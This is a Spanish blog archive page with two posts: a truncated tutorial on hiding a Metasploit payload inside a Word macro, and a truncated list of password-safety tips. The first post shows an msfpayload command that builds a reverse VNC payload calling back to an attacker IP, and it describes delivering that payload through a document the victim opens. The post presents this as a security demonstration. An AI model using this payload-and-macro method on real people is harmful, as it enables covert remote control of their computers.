Entradas

Mostrando entradas de julio 14, 2010

MetaSploit con Microsoft Word

Imagen
A la hora de demostrar falencias de seguridad por parte de los usuarios, una de las pruebas de concepto más simples y efectivas que podemos realizar es la de incluir un payload de MetaSploit dentro de un archivo Word.

En tres simples pasos, vamos a generar un payload de MetaSploit como una macro de visual basic, luego vamos a embeber esta macro en un archivo Word, y finalmente vamos a dejar escuchando por la conexión reversa que se va a realizar cuando la víctima abra el archivo.
1. Generamos el Paylaod
Seleccionamos como payload una conexión reversa de VNC, que se conectará a la IP "10.10.10.10" en el puerto "443":

./msfpayload windows/vncinject/reverse_tcp LHOST=10.10.10.10 LPORT=443 V > payload.bas
No es necesario que la víctima tenga instalado un servidor de VNC, pero si que el atacante tenga el vncviewer instalado. Si no lo tiene: "apt-get install vncviewer".

Consejos para el uso correcto de las contraseñas

Imagen
La contraseña es el nivel de seguridad más básico del cual disponemos, una contraseña es una señal secreta que, en términos informáticos, permite el acceso a nuestro ordenador, programa o acceso web de forma autorizada.Las contraseñas nos permiten acceder a un sistema operativo, a un programa o a un determinado acceso a través de Internet.Tan importante es disponer de una contraseña segura como tener claro para que será utilizada. También es importante tener creadas distintas contraseñas, cada una para un determinado tipo de acceso, ya que unificar las contraseñas aumenta su vulnerabilidad.Unos ejemplos de a lo que podríamos estar expuestos en el caso de que nos roben las contraseñas son:Suplantación de identidadQue accedan a nuestros documentos personales, documentos confidenciales y correo electrónicoAcceder a nuestra cuenta corriente y hacerse con el control de la misma Hacer un buen uso de las contraseñasEs de vital importancia hacer un buen uso de las contraseñas para q…